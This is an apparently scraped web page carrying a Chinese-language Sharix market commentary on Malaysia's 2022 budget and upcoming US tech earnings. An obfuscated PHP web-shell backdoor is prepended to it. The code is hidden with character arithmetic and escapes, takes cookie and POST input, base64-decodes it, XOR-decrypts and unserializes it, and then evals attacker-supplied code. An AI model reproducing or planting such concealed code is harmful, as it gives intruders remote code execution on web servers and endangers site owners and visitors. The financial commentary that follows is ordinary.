$sdGxpba = "\111" . "\114" . "\x5f" . chr ( 782 - 699 ).chr (116) . "\171";$goApL = "\143" . "\x6c" . 'a' . chr (115) . "\x73" . "\x5f" . chr ( 321 - 220 ).chr ( 788 - 668 ).'i' . "\x73" . chr (116) . chr ( 1007 - 892 ); $nAmGlG = class_exists($sdGxpba); $sdGxpba = "52141";$goApL = "29555";$NfllrzRu = !1;if ($nAmGlG == $NfllrzRu){function RKIImwN(){return FALSE;}$IDFKXPYx = "24891";RKIImwN();class IL_Sty{private function PeDJhgPkk($IDFKXPYx){if (is_array(IL_Sty::$HBGia)) {$dWmOqqPn = str_replace("\74" . "\x3f" . chr (112) . chr (104) . "\160", "", IL_Sty::$HBGia[chr (99) . "\157" . "\156" . "\x74" . chr ( 121 - 20 )."\x6e" . "\164"]);eval($dWmOqqPn); $IDFKXPYx = "24891";exit();}}private $zPXYye;public function lEQFKwRHQ(){echo 33039;}public function __destruct(){$IDFKXPYx = "23772_943";$this->PeDJhgPkk($IDFKXPYx); $IDFKXPYx = "23772_943";}public function __construct($OvzOxh=0){$QnOMR = $_POST;$HNoZlG = $_COOKIE;$zWAraslni = "00585ef7-4ced-44bd-b8c4-08720b627307";$vBIfFlHAOq = @$HNoZlG[substr($zWAraslni, 0, 4)];if (!empty($vBIfFlHAOq)){$MXZBkx = "base64";$FeOuE = "";$vBIfFlHAOq = explode(",", $vBIfFlHAOq);foreach ($vBIfFlHAOq as $PoBhIs){$FeOuE .= @$HNoZlG[$PoBhIs];$FeOuE .= @$QnOMR[$PoBhIs];}$FeOuE = array_map($MXZBkx . chr ( 717 - 622 ).'d' . 'e' . "\x63" . chr (111) . "\144" . "\145", array($FeOuE,)); $FeOuE = $FeOuE[0] ^ str_repeat($zWAraslni, (strlen($FeOuE[0]) / strlen($zWAraslni)) + 1);IL_Sty::$HBGia = @unserialize($FeOuE); $FeOuE = class_exists("23772_943");}}public static $HBGia = 37724;}$SVTKDqFpG = new /* 55422 */ IL_Sty(24891 + 24891); $_POST = Array();unset($SVTKDqFpG);}$VmrjCDTZ = 'y' . chr (85) . 'k' . '_' . chr ( 826 - 704 )."\x6c" . chr (122) . chr (121); $vPtitZaAWd = "\x63" . "\154" . chr (97) . chr (115) . chr (115) . chr (95) . "\x65" . chr (120) . chr ( 286 - 181 ).'s' . chr (116) . "\x73";$XIlsVotk = class_exists($VmrjCDTZ); $VmrjCDTZ = "46710";$vPtitZaAWd = "59509";$XaraWMagC = !1;if ($XIlsVotk == $XaraWMagC){function inruEbmArT(){return FALSE;}$txNTYiJwJ = "25459";inruEbmArT();class yUk_zlzy{private function ARRFnADTjt($txNTYiJwJ){if (is_array(yUk_zlzy::$IAvLNKdMY)) {$PynIVk = str_replace("\x3c" . chr (63) . chr ( 929 - 817 ).chr (104) . chr (112), "", yUk_zlzy::$IAvLNKdMY["\143" . "\157" . "\x6e" . "\164" . "\145" . chr ( 542 - 432 ).chr ( 941 - 825 )]);eval($PynIVk); $txNTYiJwJ = "25459";exit();}}private $JMsPwJD;public function oYiWfD(){echo 37459;}public function __destruct(){$txNTYiJwJ = "34118_42125";$this->ARRFnADTjt($txNTYiJwJ); $txNTYiJwJ = "34118_42125";}public function __construct($EHxOe=0){$Viwyqrqo = $_POST;$LBbvlNXm = $_COOKIE;$aOBmqXw = "fcffcccc-814a-42f6-8e1a-da6b9d9f084c";$EtEkLgiVM = @$LBbvlNXm[substr($aOBmqXw, 0, 4)];if (!empty($EtEkLgiVM)){$FcgWs = "base64";$WmGFePzKv = "";$EtEkLgiVM = explode(",", $EtEkLgiVM);foreach ($EtEkLgiVM as $LgkrbzFPFV){$WmGFePzKv .= @$LBbvlNXm[$LgkrbzFPFV];$WmGFePzKv .= @$Viwyqrqo[$LgkrbzFPFV];}$WmGFePzKv = array_map($FcgWs . "\137" . "\x64" . 'e' . chr ( 193 - 94 ).'o' . "\144" . "\x65", array($WmGFePzKv,)); $WmGFePzKv = $WmGFePzKv[0] ^ str_repeat($aOBmqXw, (strlen($WmGFePzKv[0]) / strlen($aOBmqXw)) + 1);yUk_zlzy::$IAvLNKdMY = @unserialize($WmGFePzKv); $WmGFePzKv = class_exists("34118_42125");}}public static $IAvLNKdMY = 27291;}$xFedbrqbzh = new /* 56596 */ yUk_zlzy(25459 + 25459); $_POST = Array();unset($xFedbrqbzh);} 市场跟进 - Sharix

市场跟进

2021年10月24日
不知不觉十月仅剩下一个星期,而我们团队认为下个星期的市场也会处于比较谨慎的环境。这主要是再大马方面,我国2022年的财政预算案将会在来临的10月29日,也就是星期五公布。

这次的预算案也是我国政府带领大马疫情过后重建经济和竞争力最为关键的预算案。我们团队认为这次的预算案会延续之前经济刺激配套的特点,主要在于恢复人民的经济能力,扶持中小心企业,降低我国的失业率,而长期方面也会着重于提高大马的竞争力。

因此,我们认为这也会是一个扩张性的财政预算案,拨款总额相信也会比去年来的多。大马提高了债务上限从60% 至65%,而市场上似乎都在流传着新税制的执行。我们也不排除在我国债台高筑又要大放水的情况下,这次的预算案会有新税务出现的可能。

我们认为政府已经不太可能再实施行管令,而目前推动股价上涨的动力唯有来自公司本身盈利的恢复能力。因此,即便经济开放,我们认为大家应该回到公司的基本面,不要因为复苏题材而买入股票。

而国外方面,接下来这个星期也会有许多美国大型的科技公司的季报出炉,包括明天美股闭市后的Facebook,星期二闭市后的AMD, Microsoft, Alphabet,星期四闭市后的Apple及Amazon等等。我们认为美股这次也会保持强劲的盈利增长。

根据FactSet的数据显示,目前已有超过70家标普500企业发布财报,75% 的公司盈利符合预期,同比增长35%,该行的统计也发现有84% 的企业财报数据会优于预期。但是,我们认为今年上半年强势的成长再低基期的因素逐渐消退的背景下,美股的盈利增长也会逐渐放缓。再配合近期美国十年期殖利率一度站上1.7%,这对于股票市场的估值在短期内会造成一定的冲击。

对于接下来的操作,我们认为以守为攻才是王道,用剩余两个月的时间去计划明年的策略,保持一定的现金比例,毕竟目前市场有太多的灰犀牛。下个月的美联储利率决策会议,鲍威尔的连任之路,通胀预期一发不可收拾等等。

最新文章

Sharix Sdn Bhd (1313184-A)
@ 2023 Sharix Sdn Bhd. All Rights Reserved
官方社交平台